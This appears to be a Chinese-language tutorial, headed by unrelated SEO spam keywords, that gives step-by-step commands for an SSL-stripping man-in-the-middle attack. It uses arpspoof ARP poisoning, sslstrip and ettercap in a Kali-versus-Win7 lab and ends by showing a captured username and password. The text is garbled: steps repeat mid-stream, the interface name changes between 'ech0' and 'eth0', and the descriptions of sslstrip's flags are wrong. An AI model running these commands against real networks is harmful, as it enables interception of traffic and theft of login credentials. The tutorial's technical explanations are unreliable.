做网站手机版,湘潭网站建设哪些公司,中铁建设中南公司官方网站,手机图文制作软件1.首先安装sslstrip
命令执行#xff1a;apt-get install sslstrip 2.启动arp欺骗
arpspoof -i ech0 -t 192.168.159.148 192.168.159.2
arpspoof -i ech0(网卡) -t 目标机ip 本地局域网关 3.命令行输入: vim /etc/ettercap/etter.conf进入配置文件 找到下红框的内容apt-get install sslstrip 2.启动arp欺骗
arpspoof -i ech0 -t 192.168.159.148 192.168.159.2
arpspoof -i ech0(网卡) -t 目标机ip 本地局域网关 3.命令行输入: vim /etc/ettercap/etter.conf进入配置文件 找到下红框的内容输入字母i进入编辑模式把#注释符去掉按键盘右上角ESC键退出编辑模式进入命令行模式同时按住shift键与冒号键然后输入wq进行保存并退出。 4.另外再启动第二kali终端输入下面命令
命令执行sslstrip -a -f –k sslstrip是一个命令行工具用于将HTTPS连接转换为HTTP连接以便进行中间人攻击。其中
-a选项表示将所有请求重定向到攻击者控制的设备上
-f选项表示强制使用HTTP而不是HTTPS
-k选项表示忽略证书错误。
因此这个命令的作用是在中间人攻击中使用sslstrip工具将HTTPS连接转换为HTTP连接并将所有请求重定向到攻击者控制的设备上同时忽略证书错误。
5.另起第三个kali终端输入ettercap -Tq -i eth0
-T启动文本模式 q安静模式 -i攻击机网卡 6.Win7访问https协议网站后台
注意使用google浏览器 不要使用用IE浏览器默认开启了HSTSHTTP Strict Transport Security--HTTP严格传输安全功能该功能会强制浏览器只能通过HTTPS协议访问原本就是HTTPS协议编写的网站
7.进入登入后台随机输入账号密码 8. 回到kali虚拟机查看ettercap工具的抓取结果 最后抓到账号和密码123456qq.com 123456
